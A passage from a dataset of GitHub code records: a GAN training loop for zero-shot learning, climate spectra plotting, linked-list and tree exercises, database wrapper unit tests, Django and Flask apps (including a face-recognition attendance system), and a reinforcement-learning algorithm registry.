netG(Variable(syn_noise, volatile=True), Variable(syn_att, volatile=True))\n syn_feature.narrow(0, i * num, num).copy_(output.data.cpu())\n syn_label.narrow(0, i * num, num).fill_(iclass)\n\n return syn_feature, syn_label\n\ndef generate_syn_feature_with_grad(netG, classes, attribute, num):\n nclass = classes.size(0)\n # syn_feature = torch.FloatTensor(nclass*num, opt.resSize)\n syn_label = torch.LongTensor(nclass * num)\n syn_att = torch.FloatTensor(nclass * num, opt.attSize)\n syn_noise = torch.FloatTensor(nclass * num, opt.nz)\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n syn_label = syn_label.cuda()\n syn_noise.normal_(0, 1)\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.narrow(0, i * num, num).copy_(iclass_att.repeat(num, 1))\n syn_label.narrow(0, i * num, num).fill_(iclass)\n syn_feature = netG(Variable(syn_noise), Variable(syn_att))\n return syn_feature, syn_label.cpu()\n\ndef map_label(label, classes):\n mapped_label = torch.LongTensor(label.size())\n for i in range(classes.size(0)):\n mapped_label[label==classes[i]] = i\n\n return mapped_label\n\n\ndef pairwise_distances(x, y=None):\n '''\n Input: x is a Nxd matrix\n y is an optional Mxd matirx\n Output: dist is a NxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]\n if y is not given then use 'y=x'.\n i.e. 
dist[i,j] = ||x[i,:]-y[j,:]||^2\n '''\n x_norm = (x ** 2).sum(1).view(-1, 1)\n if y is not None:\n y_t = torch.transpose(y, 0, 1)\n y_norm = (y ** 2).sum(1).view(1, -1)\n else:\n y_t = torch.transpose(x, 0, 1)\n y_norm = x_norm.view(1, -1)\n\n dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)\n # Ensure diagonal is zero if x=y\n if y is None:\n dist = dist - torch.diag(dist.diag)\n return torch.clamp(dist, 0.0, np.inf)\n\n# setup optimizer\noptimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n\n\ndef calc_gradient_penalty(netD, real_data, fake_data, input_att):\n # print real_data.size()\n alpha = torch.rand(opt.batch_size, 1)\n alpha = alpha.expand(real_data.size())\n if opt.cuda:\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n if opt.cuda:\n interpolates = interpolates.cuda()\n\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD(interpolates, Variable(input_att))\n\n ones = torch.ones(disc_interpolates.size())\n if opt.cuda:\n ones = ones.cuda()\n\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=ones,\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * opt.lambda1\n return gradient_penalty\n\n\n# train a classifier on seen classes, obtain \\theta of Equation (4)\npretrain_cls = classifier.CLASSIFIER(data.train_feature, util.map_label(data.train_label, data.seenclasses),\n data.seenclasses.size(0), opt.resSize, opt.cuda, 0.001, 0.5, 100, 100,\n opt.pretrain_classifier)\n\n# freeze the classifier during the optimization\nfor p in pretrain_cls.model.parameters(): # set requires_grad to False\n p.requires_grad = False\n\nfor epoch in range(opt.nepoch):\n FP = 0\n mean_lossD = 0\n mean_lossG = 0\n\n for i in range(0, data.ntrain, opt.batch_size):\n\n for p in netD.parameters():\n p.requires_grad = True\n\n for iter_d in range(opt.critic_iter):\n sample()\n netD.zero_grad()\n sparse_real = opt.resSize - input_res[1].gt(0).sum()\n input_resv = Variable(input_res)\n input_attv = Variable(input_att)\n\n criticD_real = netD(input_resv, input_attv)\n criticD_real = criticD_real.mean()\n criticD_real.backward(mone)\n\n noise.normal_(0, 1)\n noisev = Variable(noise)\n fake = netG(noisev, input_attv)\n fake_norm = fake.data[0].norm()\n sparse_fake = fake.data[0].eq(0).sum()\n criticD_fake = netD(fake.detach(), input_attv)\n criticD_fake = criticD_fake.mean()\n criticD_fake.backward(one)\n\n gradient_penalty = calc_gradient_penalty(netD, input_res, fake.data, input_att)\n gradient_penalty.backward()\n\n Wasserstein_D = criticD_real - criticD_fake\n D_cost = criticD_fake - criticD_real + gradient_penalty\n optimizerD.step()\n\n for p in netD.parameters(): # reset requires_grad\n p.requires_grad = False # avoid computation\n\n netG.zero_grad()\n input_attv = Variable(input_att)\n noise.normal_(0, 1)\n noisev = Variable(noise)\n fake = netG(noisev, input_attv)\n criticG_fake = netD(fake, input_attv)\n criticG_fake = criticG_fake.mean()\n G_cost = -criticG_fake\n # classification loss\n c_errG = cls_criterion(pretrain_cls.model(fake), Variable(input_label))\n\n labels = Variable(input_label.view(opt.batch_size, 1))\n real_proto = Variable(data.real_proto.cuda())\n dists1 = pairwise_distances(fake,real_proto)\n min_idx1 = torch.zeros(opt.batch_size, data.train_cls_num)\n for i in 
range(data.train_cls_num):\n min_idx1[:,i] = torch.min(dists1.data[:,i*opt.n_clusters:(i+1)*opt.n_clusters],dim=1)[1] + i*opt.n_clusters\n min_idx1 = Variable(min_idx1.long().cuda())\n loss2 = dists1.gather(1,min_idx1).gather(1,labels).squeeze().view(-1).mean()\n\n seen_feature, seen_label = generate_syn_feature_with_grad(netG, data.seenclasses, data.attribute,opt.loss_syn_num)\n seen_mapped_label = map_label(seen_label, data.seenclasses)\n transform_matrix = torch.zeros(data.train_cls_num, seen_feature.size(0)) # 150x7057\n for i in range(data.train_cls_num):\n sample_idx = (seen_mapped_label == i).nonzero().squeeze()\n if sample_idx.numel() == 0:\n continue\n else:\n cls_fea_num = sample_idx.numel()\n transform_matrix[i][sample_idx] = 1 / cls_fea_num * torch.ones(1, cls_fea_num).squeeze()\n transform_matrix = Variable(transform_matrix.cuda())\n fake_proto = torch.mm(transform_matrix, seen_feature) # 150x2048\n dists2 = pairwise_distances(fake_proto,Variable(data.real_proto.cuda())) # 150 x 450\n min_idx2 = torch.zeros(data.train_cls_num, data.train_cls_num)\n for i in range(data.train_cls_num):\n min_idx2[:,i] = torch.min(dists2.data[:,i*opt.n_clusters:(i+1)*opt.n_clusters],dim=1)[1] + i*opt.n_clusters\n min_idx2 = Variable(min_idx2.long().cuda())\n lbl_idx = Variable(torch.LongTensor(list(range(data.train_cls_num))).cuda())\n loss1 = dists2.gather(1,min_idx2).gather(1,lbl_idx.unsqueeze(1)).squeeze().mean()\n\n errG = G_cost + opt.cls_weight * c_errG + opt.proto_param2 * loss2 + opt.proto_param1 * loss1\n errG.backward()\n optimizerG.step()\n\n print('EP[%d/%d]************************************************************************************' % (\n epoch, opt.nepoch))\n\n # evaluate the model, set G to evaluation mode\n netG.eval()\n # Generalized zero-shot learning\n if opt.gzsl:\n syn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\n train_X = torch.cat((data.train_feature, syn_feature), 0)\n train_Y = torch.cat((data.train_label, syn_label), 0)\n nclass = opt.nclass_all\n cls = classifier2.CLASSIFIER(train_X, train_Y, data, nclass, opt.cuda, opt.classifier_lr, 0.5, 50, 2*opt.syn_num,True)\n # print('unseen=%.4f, seen=%.4f, h=%.4f' % (cls.acc_unseen, cls.acc_seen, cls.H))\n # Zero-shot learning\n else:\n syn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\n cls = classifier2.CLASSIFIER(syn_feature, util.map_label(syn_label, data.unseenclasses), data,\n data.unseenclasses.size(0), opt.cuda, opt.classifier_lr, 0.5, 50, 2*opt.syn_num,\n False, opt.ratio, epoch)\n # acc = cls.acc\n # print('unseen class accuracy= ', cls.acc)\n del cls\n cls = None\n # reset G to training mode\n netG.train()\n sys.stdout.flush()\n\ntime_elapsed = time.time() - since\nprint('End run!!!')\nprint('Time Elapsed: {}'.format(time_elapsed))\nprint(GetNowTime())","repo_name":"lijin118/LisGAN","sub_path":"lisgan.py","file_name":"lisgan.py","file_ext":"py","file_size_in_byte":15606,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"54"} +{"seq_id":"18762471566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 28 17:44:16 2021\n\n@author: paclk\n\"\"\"\nimport os\n\nimport numpy as np\nimport xarray as xr\n\nimport matplotlib.pyplot as plt\n\n\n# dir = 'C:/Users/paclk/OneDrive - University of Reading/ug_project_data/Data/'\n# file = 'diagnostics_3d_ts_21600.nc'\n# dx = 50.0\n# dy = 50.0\n\n\ndir = 'C:/Users/paclk/OneDrive - University of 
Reading/traj_data/CBL/'\nfile = 'diagnostics_3d_ts_13200.nc'\ndx = 5.0\ndy = 5.0\n\n# Set up outfile\noutdir = os.path.join(dir, 'spectra/')\nos.makedirs(outdir, exist_ok = True) # make outdir if it doesn't already exist\nouttag = \"spectra_w_2D\"\noutfile = os.path.join(outdir,('.').join(os.path.basename(file).split('.')[:-1]) + \"_\"+outtag+\".nc\")\n\n\ndso = xr.open_dataset(outfile)\nk = dso['hfreq']\nkx = dso['xfreq']\nky = dso['yfreq']\nkE_k = k * dso['spec_2d_w']\nkE_kx = kx * dso['spec_xdir_w']\nkE_ky = ky * dso['spec_ydir_w']\n\n#kE_k = k * dso['spec_2d_u']\n\n\nkE_kp = kE_k.mean(dim='time').sel(z=600, method='nearest')\nkE_kp.plot(xscale='log', yscale='log')\n\nkE_kxp = kE_kx.mean(dim='time').sel(z=600, method='nearest')\nkE_kxp.plot(xscale='log', yscale='log')\nkE_kyp = kE_ky.mean(dim='time').sel(z=600, method='nearest')\nkE_kyp.plot(xscale='log', yscale='log')\n\n#plt.ylim([0.0001,1])\n#plt.xlim([0.0001,0.1])\nplt.ylabel('kE(k)')\nplt.tight_layout()\nax=plt.gca()\n\nxr = ax.get_xlim()\nyr = ax.get_ylim()\n\n#k = kx\n#kE_kp = kE_kxp\n\ni = kE_kp.argmax()\nif i.size > 1:\n i = i[0]\n\nymax = kE_kp[i]\nx_ymax = k[i]\n\nyidl = lambda x : ymax.values * (x / x_ymax.values)**(-2/3)\n\nplt.plot(xr, yidl(xr))\n\n\ndso.close()\n\n\n","repo_name":"ReadingClouds/Subfilter","sub_path":"examples/spectra_plot.py","file_name":"spectra_plot.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32610561984","text":"\nclass Nodes:\n def __init__(self, data1):\n self.data = data1\n self.next = None\n\n\nclass Linklist:\n def __init__(self):\n self.start = None\n\n def addnode(self, data):\n new_node = Nodes(data)\n if self.start is None:\n self.start = new_node\n else:\n temp = self.start\n while temp.next:\n temp = temp.next\n temp.next = new_node\n\n def display(self):\n temp = self.start\n while temp is not None:\n print(temp.data)\n temp = temp.next\n def swap_node(self):\n count = 1\n temp = self.start\n temp1 = self.start\n num1 = int(input(\"enter first node to be swapped\"))\n num2 = int(input(\"enter second node to be swapped\"))\n while (count < num1 - 1):\n temp = temp.next\n count +=1\n count = 1\n while (count < num2 - 1):\n temp1 = temp1.next\n count +=1\n a=[]\n a[0] = temp.next\n a[1] = temp.next.next\n a[2] = temp1.next\n a[3] = temp1.next.next\n temp.next.next = a[3]\n temp1.next.next = a[1]\n temp.next = a[2]\n temp1.next = a[0]\n\n def swapNodes(self ):\n\n x=int(input(\"enter the first node:-\"))\n y=int(input(\"enter the second node:-\"))\n if x == y:\n return\n temp1 = self.start\n temp=None\n while temp1.data != x:\n temp = temp1\n temp1 = temp1.next\n\n temp3 = self.start\n temp2 = None\n while temp3.data != y:\n temp2 = temp3\n temp3 = temp3.next\n if temp != None:\n temp.next = temp3\n else:\n self.start = temp3\n if temp2 != None:\n temp2.next = temp1\n else:\n self.start = temp1\n temp5 = temp1.next\n temp1.next = temp3.next\n temp3.next = temp5\n\n\nl = Linklist()\ncount=int(input(\"enter the total no of node\"))\nfor i in range(count):\n new_data = int(input(\"enter the data-\"))\n l.addnode(new_data)\nl.display()\nl.swapNodes()\nl.display()\n\n","repo_name":"Shivam4819/python","sub_path":"node_swap.py","file_name":"node_swap.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16440743333","text":"import logging\nimport os\nimport tempfile\nimport time\nimport 
unittest2 as unittest\n\nimport redis\nfrom mock import patch, call, Mock\nimport MySQLdb\n\nimport trends.db as db\nimport trends.exceptions as exceptions\n \nlogging.basicConfig(filename='log_test_db.txt',level=logging.DEBUG)\n\nclass DbTest(unittest.TestCase):\n\n def setUp(self):\n self.db = db.Db()\n self.cfg_mysql_host = 'test_mysql_host'\n self.cfg_mysql_user = 'test_mysql_user'\n self.cfg_mysql_password = 'test_mysql_password'\n self.cfg_mysql_db = 'test_mysql_db'\n self.cfg_twitter_userid = 'test_twitter_userid'\n self.cfg_twitter_password = 'test_twitter_password'\n self.cfg_redis_host = 'test_redis_host'\n self.cfg_redis_port = 1\n self.cfg_rabbitmq_host = 'test_rabbitmq_host'\n self.cfg_rabbitmq_userid = 'test_rabbitmq_userid'\n self.cfg_rabbitmq_password = 'test_rabbitmq_password'\n\n @patch('redis.Redis')\n def test_setup_redis(self, redis_class_mock):\n redis_instance = 'test_redis_instance' \n redis_class_mock.return_value = redis_instance\n self.db.setup_redis()\n call_args_list = redis_class_mock.call_args_list\n expected = [call(host = self.cfg_redis_host,\n port = self.cfg_redis_port, db = 0),\n call(host = self.cfg_redis_host,\n port = self.cfg_redis_port, db = 1)]\n self.assertListEqual(call_args_list, expected)\n self.assertEqual(call_args_list, expected)\n self.assertIs(self.db.db_mem, redis_instance)\n self.assertIs(self.db.db_mem_posts, redis_instance)\n\n @patch.object(MySQLdb, 'connect')\n def test_setup_mysql(self, connect_mock):\n mock = Mock()\n connect_mock.return_value = mock\n cursor = 'test_cursor'\n mock.cursor.return_value = cursor\n self.db.setup_mysql()\n connect_mock.assert_called_once_with(host=self.cfg_mysql_host,\n passwd=self.cfg_mysql_password,\n charset='utf8', db=self.cfg_mysql_db, user=self.cfg_mysql_user,\n use_unicode=True)\n self.assertTrue(mock.cursor.called)\n self.assertIs(self.db.db_disk_posts, mock)\n self.assertIs(self.db.db_cursor, cursor)\n\n @patch.object(MySQLdb, 'connect')\n def test_setup_mysql_connect_error(self, connect_mock):\n connect_mock.side_effect = MySQLdb.Error()\n self.assertRaises(exceptions.DbError, self.db.setup_mysql)\n\n @patch.object(db.Db, 'setup_mysql')\n def test_setup_mysql_loop(self, setup_mysql_mock):\n self.db.retries = 1\n self.db.setup_mysql_loop()\n self.assertTrue(setup_mysql_mock.called)\n\n @patch.object(db.Db, 'setup_mysql')\n @patch.object(time, 'sleep')\n def test_setup_mysql_loop_db_error(self, time_sleep_mock, setup_mysql_mock):\n self.db.retries = 2\n self.db.retry_wait = 0.1\n setup_mysql_mock.side_effect = exceptions.DbError() \n self.assertRaises(exceptions.DbError, self.db.setup_mysql_loop) \n self.assertEqual(setup_mysql_mock.call_count, 2)\n self.assertEqual(time_sleep_mock.call_count, 2)\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_db_0(self, db_mem_mock):\n db_mem_mock.get.return_value = 'test'\n r = self.db.redis_command(0, 'get', 'test_key')\n db_mem_mock.get.assert_called_once_with('test_key')\n self.assertEqual(r, 'test')\n\n @patch.object(db.Db, 'db_mem_posts')\n def test_redis_command_db_1(self, db_mem_posts_mock):\n db_mem_posts_mock.get.return_value = 'test'\n r = self.db.redis_command(1, 'get', 'test_key')\n db_mem_posts_mock.get.assert_called_once_with('test_key')\n self.assertEqual(r, 'test')\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_redis_error(self, db_mem_mock):\n self.db.cmd_retries = 2\n self.db.cmd_retry_wait = 0.1\n db_mem_mock.get.side_effect = redis.exceptions.RedisError()\n self.assertRaises(exceptions.DbError,\n 
self.db.redis_command,\n 0, 'get', 'test_key')\n db_mem_mock.get.assert_called_with('test_key')\n self.assertEqual(db_mem_mock.get.call_count, 2)\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_attribute_error(self, db_mem_mock):\n db_mem_mock.get.side_effect = AttributeError()\n self.assertRaises(exceptions.DbError,\n self.db.redis_command,\n 0, 'get', 'test_key')\n db_mem_mock.get.assert_called_once_with('test_key')\n \n @patch.object(db.Db, 'db_disk_posts')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command(self, db_cursor_mock, db_disk_posts_mock):\n db_cursor_mock.fetchall.return_value = ((1,2,3))\n r = self.db.mysql_command('execute', 'test_sql', False, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n self.assertTrue(db_cursor_mock.fetchall.called)\n self.assertFalse(db_disk_posts_mock.commit.called)\n self.assertEqual(r, ((1,2,3)))\n\n @patch.object(db.Db, 'db_disk_posts')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_writer(self, db_cursor_mock, db_disk_posts_mock):\n db_cursor_mock.execute.return_value = 2\n r = self.db.mysql_command('execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n self.assertTrue(db_disk_posts_mock.commit.called)\n self.assertEqual(r, 2)\n\n @patch.object(db.Db, 'setup_mysql_loop')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_operational_error(self, db_cursor_mock,\n setup_mysql_loop_mock):\n db_cursor_mock.execute.side_effect = MySQLdb.OperationalError()\n setup_mysql_loop_mock.side_effect = exceptions.DbError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'setup_mysql_loop')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_internal_error(self, db_cursor_mock,\n setup_mysql_loop_mock):\n db_cursor_mock.execute.side_effect = MySQLdb.InternalError()\n setup_mysql_loop_mock.side_effect = exceptions.DbError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_internal_error(self, db_cursor_mock):\n self.db.cmd_retries = 2\n self.db.cmd_retry_wait = 0.1\n db_cursor_mock.execute.side_effect = MySQLdb.Error()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_with(\n 'test_sql', ('test_arg',))\n self.assertEqual(db_cursor_mock.execute.call_count, 2)\n\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_attribute_error(self, db_cursor_mock):\n db_cursor_mock.execute.side_effect = AttributeError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'redis_cmd')\n def test_get_persons(self, redis_cmd_mock):\n data = (('1:test_first_name_1:test_name_1:test_nickname_1:2:'\\\n '[\\\"test_word_1\\\", \\\"test_word_2\\\"]'), \n ('3:test_first_name_2:test_name_2:test_nickname_2:4:'\\\n '[\\\"test_word_3\\\", \\\"test_word_4\\\"]'))\n redis_cmd_mock.return_value = data\n r = self.db.get_persons()\n self.assertDictEqual(r[0],\n {'id': 1, 'first_name': 'test_first_name_1', 'name': 
'test_name_1',\n 'nickname': 'test_nickname_1', 'group': 2, 'rel': {},\n 'posts_count': 0,\n 'words': ['test_word_1', 'test_word_2']})\n self.assertDictEqual(r[1],\n {'id': 3, 'first_name': 'test_first_name_2', 'name': 'test_name_2',\n 'nickname': 'test_nickname_2', 'group': 4, 'rel': {},\n 'posts_count': 0,\n 'words': ['test_word_3', 'test_word_4']})\n redis_cmd_mock.assert_called_once_with('lrange', 'persons', 0, -1)\n \n @patch.object(db.Db, 'redis_cmd')\n def test_set_persons(self, redis_cmd_mock):\n with open('names.txt', 'w') as f:\n f.write('test_name_1\\ntest_name_2\\n')\n self.db.set_persons()\n self.assertEqual(redis_cmd_mock.call_args_list,\n [call('delete', 'persons'), call('rpush', 'persons', 'test_name_1'),\n call('rpush', 'persons', 'test_name_2')]) \n os.remove('names.txt')\n \n @patch.object(db.Db, 'set')\n @patch.object(db.Db, 'sql_write')\n def test_set_post_redis(self, sql_write_mock, set_mock):\n post_id = 2\n value = 'test_value'\n self.db.posts_tid = 1\n self.db.set_post(post_id, value)\n set_mock.assert_called_once_with('post:%d' % (post_id), value, db=1)\n self.assertFalse(sql_write_mock.called)\n\n @patch.object(db.Db, 'set')\n @patch.object(db.Db, 'sql_write')\n def test_set_post_sql(self, sql_write_mock, set_mock):\n post_id = 1\n value = 'test_value'\n self.db.posts_tid = 2\n self.db.set_post(post_id, value)\n sql = 'insert into tp_post(post_id, post) values(%s, %s)'\\\n 'on duplicate key update post=%s'\n sql_write_mock.assert_called_once_with(sql, post_id, value, value)\n self.assertFalse(set_mock.called)\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vgoklani/pytolab-trends","sub_path":"trends/test/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14361381398","text":"from django.urls import path\nfrom messagebot import views\n\nurlpatterns = [\n path('', views.hello_world, name='hello_world'),\n path('help', views.help, name='help'),\n path('display',views.display,name=\"display\"),\n path('schedule',views.schedule_event,name=\"schedule_event\"),\n path('message',views.get_message,name=\"get_message\"),\n path('sendmessage',views.send_message,name=\"send_message\"),\n]","repo_name":"mundohbl2020/schedule_messages","sub_path":"messagebot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29082869081","text":"from flask import Flask,flash,redirect,url_for,render_template,request\r\nimport cv2\r\nimport urllib.request\r\nimport numpy as np\r\nimport face_recognition\r\nfrom datetime import datetime\r\nimport os\r\nimport pandas as pd\r\nfrom werkzeug.utils import secure_filename\r\n\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nUPLOAD_FOLDER = 'attendance_images'\r\n\r\napp.config['SECRET_KEY'] = 'dineshchakri'\r\napp.config['UPLOAD_PATH'] = 'attendance_images'\r\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\r\n\r\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}\r\n\r\ndf = pd.read_csv('attendance.csv')\r\n\r\n\r\n@app.route('/show_data', methods=(\"POST\", \"GET\"))\r\ndef showData():\r\n # Convert pandas dataframe to html table flask\r\n df_html = df.to_html()\r\n return render_template('index.html', data=df_html)\r\n\r\n\r\n@app.route('/', methods=[\"GET\"])\r\ndef home():\r\n return 
render_template('index.html')\r\n\r\n\r\n@app.route('/Upload',methods=[\"GET\",\"POST\"])\r\ndef upload_file():\r\n if request.method == 'POST' :\r\n f = request.files['file-name']\r\n f.save(os.path.join(app.config['UPLOAD_PATH'],f.filename))\r\n return render_template('index.html' , msg=\"file uploaded successfully\")\r\n return render_template('index.html',msg=\"please choose a file\")\r\n\r\n@app.route('/detection')\r\ndef Attendance():\r\n\r\n path = 'attendance_images'\r\n images = []\r\n classNames = []\r\n x = \" \"\r\n myList = os.listdir(path)\r\n print(myList)\r\n for cl in myList:\r\n curImg = cv2.imread(f'{path}/{cl}')\r\n images.append(curImg)\r\n classNames.append(os.path.splitext(cl)[0])\r\n print(classNames)\r\n\r\n def findEncodings(image):\r\n encodeList = []\r\n for img in image:\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\n def mark_attendance(name):\r\n with open('attendance.csv','r+') as f:\r\n myDataList = f.readlines()\r\n namelist = []\r\n for line in myDataList:\r\n entry = line.split(',')\r\n namelist.append(entry[0])\r\n if name not in namelist:\r\n now = datetime.now()\r\n dtString = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtString}')\r\n\r\n encodeListKnown = findEncodings(images)\r\n print('encoding complete')\r\n\r\n cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n\r\n while True:\r\n success, img = cap.read()\r\n if img is None:\r\n print('Wrong path:')\r\n else:\r\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n facesCurFrame = face_recognition.face_locations(imgS)\r\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\r\n\r\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\r\n matches = face_recognition.compare_faces(encodeListKnown, encodeFace)\r\n faceDis = face_recognition.face_distance(encodeListKnown, encodeFace)\r\n print(faceDis)\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = classNames[matchIndex].upper()\r\n x = name\r\n\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (255, 0, 0), cv2.FILLED)\r\n mark_attendance(name)\r\n cv2.imshow('webcam', img)\r\n cv2.waitKey(1)\r\n\r\n return render_template('index.html', check=x)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"dinesh-webdesign/attendance-system-","sub_path":"flaskblog.py","file_name":"flaskblog.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70069336483","text":"import unittest\nimport pytest\nfrom dynamic_programming.unique_paths import Solution\n\n\n@pytest.mark.parametrize(\"m,n,expected\", [\n (3, 7, 28),\n (3, 2, 3)\n])\ndef test_unique_paths(m, n, expected):\n assert expected == Solution().unique_paths(m, n)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sikakente/blind-75","sub_path":"tests/dynamic_programming/test_unique_paths.py","file_name":"test_unique_paths.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26022566498","text":"#This file deals with basic methods for creating,searching and traversals in a binary tree\n\n#class declaration 
of a node of a Binary Tree\nclass TreeNode:\n def __init__(self,data):\n self.value = data\n self.left = None\n self.right = None\n\n# Pre-order Traversal in a Binary Tree : root,left,right {Iterative approach}\ndef preOrder(root):\n if not root:\n return\n # the output for the preorder traversal\n res = []\n stackList = [root]\n while(stackList):\n temp = stackList.pop()\n if temp :\n res.append(temp.value)\n stackList.append(temp.right)\n stackList.append(temp.left)\n\n return res\n\n# Pre-order Traversal in a Binary Tree : {Recursive Approach}\ndef preOrderRec(root) :\n if not root:\n return\n print(root.value)\n preOrderRec(root.left)\n preOrderRec(root.right)\n return\n# Post-order Traversal in a Binary Tree : left,right,root {Recursive approach}\ndef postOrder(root):\n if not root:\n return []\n # the output for the traversal\n outRes = []\n outRes.extend(postOrder(root.left))\n outRes.extend(postOrder(root.right))\n outRes.append(root.value)\n return outRes\n\n# Creating a basic Binary Tree\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nroot.right.right = TreeNode(7)\n\n# printing the pre-order Traversal\nprint(preOrder(root))\n\n#printing the post-order Traversal\nprint(postOrder(root))\n\n#printing the recursive approach for pre-order\nprint(\"The pre-order traversal is as follows\")\npreOrderRec(root)\n\n","repo_name":"codingkohli/Algorithms","sub_path":"Binary Tree/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14489847796","text":"import sys, os\nfrom sb3_contrib import QRDQN, TQC, TRPO\nfrom stable_baselines3 import A2C, DDPG, DQN, PPO, SAC, TD3\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom models import RARL\n\n# ===================================\n# Algorithms available for training\n# and evaluation\n# =================================== \n\nALGOS = {\n \"a2c\": A2C,\n \"ddpg\": DDPG,\n \"dqn\": DQN,\n \"ppo\": PPO,\n \"sac\": SAC,\n \"td3\": TD3,\n # SB3 Contrib,\n \"qrdqn\": QRDQN,\n \"tqc\": TQC,\n \"trpo\": TRPO,\n # Project's Contrib,\n \"rarl\": RARL\n}\n\n# algorithms that can be used as protagonist or adversary\nALGOS_RARL = {\n \"a2c\": A2C,\n \"ddpg\": DDPG,\n \"dqn\": DQN,\n \"ppo\": PPO,\n \"sac\": SAC,\n \"td3\": TD3,\n # SB3 Contrib,\n \"qrdqn\": QRDQN,\n \"tqc\": TQC,\n \"trpo\": TRPO,\n}","repo_name":"PMMon/torch-RARL","sub_path":"models/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"40453466804","text":"\ndef DFS(u, global_visited, g, u_parent, visited_dots):\n visited_dots.append(u)\n global_visited[u] = True\n for neighbour in g[u]:\n if not global_visited[neighbour]:\n DFS(neighbour, global_visited, g, u, visited_dots)\n\nimport sys\nimport threading\n\nsys.setrecursionlimit(10 ** 